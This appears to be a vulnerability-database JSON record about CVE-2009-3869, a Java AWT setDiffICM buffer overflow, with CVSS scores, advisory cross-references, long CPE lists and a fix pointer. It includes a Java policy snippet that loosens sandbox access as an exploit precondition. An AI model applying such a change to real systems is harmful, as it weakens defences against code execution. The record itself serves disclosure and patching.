Java Runtime Environment (JRE) allows end users to run Java applications.
Problem
A buffer overflow vulnerability in the setDiffICM function of the Abstract Window Toolkit (AWT) allows command execution when a user loads a specially crafted web page.
Exploit works on Java Runtime Environment 6 Update 16 and requires a user to open the exploit page in Firefox 2.0.x.
In order for the exploit to succeed, the security policy in JRE must allow access to classes in the sun.awt.image package. To configure JRE to allow access to classes in the sun.awt.image package, add the following lines to the Java policy file on the target system:
{"enchantments": {"score": {"value": 9.4, "vector": "NONE", "modified": "2016-10-03T15:01:55", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3869"]}, {"type": "seebug", "idList": ["SSV:70816"]}, {"type": "saint", "idList": ["SAINT:53B1A46D390ABCB591CC24072217E221", "SAINT:FBDAACB18028839834A31F8D448CEA10"]}, {"type": "exploitdb", "idList": ["EDB-ID:16298"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_SETDIFFICM_BOF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84533", "PACKETSTORM:84499"]}, {"type": "zdi", "idList": ["ZDI-09-078"]}, {"type": "suse", "idList": ["SUSE-SA:2010:002", "SUSE-SA:2009:058", "SUSE-SA:2010:004", "SUSE-SA:2010:003"]}, {"type": "nessus", "idList": ["SUSE_11_0_JAVA-1_5_0-SUN-091109.NASL", "SUSE_11_JAVA-1_4_2-IBM-100105.NASL", "REDHAT-RHSA-2009-1643.NASL", "REDHAT-RHSA-2009-1647.NASL", "SUSE9_12564.NASL", "SUSE9_12565.NASL", "SUSE_JAVA-1_4_2-IBM-6755.NASL", "SUSE_JAVA-1_5_0-IBM-6740.NASL", "SUSE_JAVA-1_5_0-IBM-6741.NASL", "SUSE_JAVA-1_4_2-IBM-6757.NASL"]}, {"type": "redhat", "idList": ["RHSA-2009:1560", "RHSA-2010:0408", "RHSA-2009:1643", "RHSA-2009:1584", "RHSA-2009:1571", "RHSA-2009:1647", "RHSA-2009:1694"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11915", "SECURITYVULNS:VULN:10369", "SECURITYVULNS:DOC:27037"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800972", "OPENVAS:66471", "OPENVAS:136141256231066469", "OPENVAS:66469", "OPENVAS:1361412562310835225", "OPENVAS:835225", "OPENVAS:800975", "OPENVAS:1361412562310800975", "OPENVAS:136141256231066471", "OPENVAS:800972"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1584"]}, {"type": "fedora", "idList": ["FEDORA:9A32710F7FF", "FEDORA:1C6D410F83E", "FEDORA:BD01E10F83E"]}, {"type": "centos", "idList": ["CESA-2009:1584"]}, {"type": "ubuntu", "idList": ["USN-859-1"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}], "modified": "2016-10-03T15:01:55", "rev": 2}, "vulnersScore": 9.4}, "reporter": "SAINT Corporation", "id": "SAINT:D64AD53ED6AECAF73B07B99B721FE9A3", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2009-11-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 16, "modified": "2009-11-27T00:00:00", "references": [], "cvelist": ["CVE-2009-3869"], "description": "Added: 11/27/2009 \nCVE: [CVE-2009-3869](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869>) \nBID: [36881](<http://www.securityfocus.com/bid/36881>) \nOSVDB: [59710](<http://www.osvdb.org/59710>) \n\n\n### Background\n\nJava Runtime Environment (JRE) allows end users to run Java applications. \n\n### Problem\n\nA buffer overflow vulnerability in the setDiffICM function of the Abstract Window Toolkit (AWT) allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Sun article 270474](<http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-078/> \n\n\n### Limitations\n\nExploit works on Java Runtime Environment 6 Update 16 and requires a user to open the exploit page in Firefox 2.0.x. \n\nIn order for the exploit to succeed, the security policy in JRE must allow access to classes in the sun.awt.image package. To configure JRE to allow access to classes in the sun.awt.image package, add the following lines to the Java policy file on the target system: \n\n> \n> grant {\n> permission java.lang.RuntimePermission\n> \"accessClassInPackage.sun.awt.image\";\n> }\n> \n\n\nThe Java policy file can be found at: \n\n> \n> C:\\Program Files\\Java\\jreX\\lib\\security\\java.policy\n> \n\nwhere X is the JRE series, such as 5 or 6. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/jre_awt_setdifficm", "lastseen": "2016-10-03T15:01:55", "edition": 1, "title": "Java Runtime Environment AWT setDiffICM buffer overflow"}
{"cve": [{"lastseen": "2021-02-02T05:40:06", "description": "Stack-based buffer overflow in the setDiffICM function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a crafted argument, aka Bug Id 6872357.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3869", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3869"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3869", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "edition": 2, "description": "Added: 11/27/2009 \nCVE: [CVE-2009-3869](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869>) \nBID: [36881](<http://www.securityfocus.com/bid/36881>) \nOSVDB: [59710](<http://www.osvdb.org/59710>) \n\n\n### Background\n\nJava Runtime Environment (JRE) allows end users to run Java applications. \n\n### Problem\n\nA buffer overflow vulnerability in the setDiffICM function of the Abstract Window Toolkit (AWT) allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Sun article 270474](<http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-078/> \n\n\n### Limitations\n\nExploit works on Java Runtime Environment 6 Update 16 and requires a user to open the exploit page in Firefox 2.0.x. \n\nIn order for the exploit to succeed, the security policy in JRE must allow access to classes in the sun.awt.image package. To configure JRE to allow access to classes in the sun.awt.image package, add the following lines to the Java policy file on the target system: \n\n> \n> grant {\n> permission java.lang.RuntimePermission\n> \"accessClassInPackage.sun.awt.image\";\n> }\n> \n\n\nThe Java policy file can be found at: \n\n> \n> C:\\Program Files\\Java\\jreX\\lib\\security\\java.policy\n> \n\nwhere X is the JRE series, such as 5 or 6. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-11-27T00:00:00", "published": "2009-11-27T00:00:00", "href": 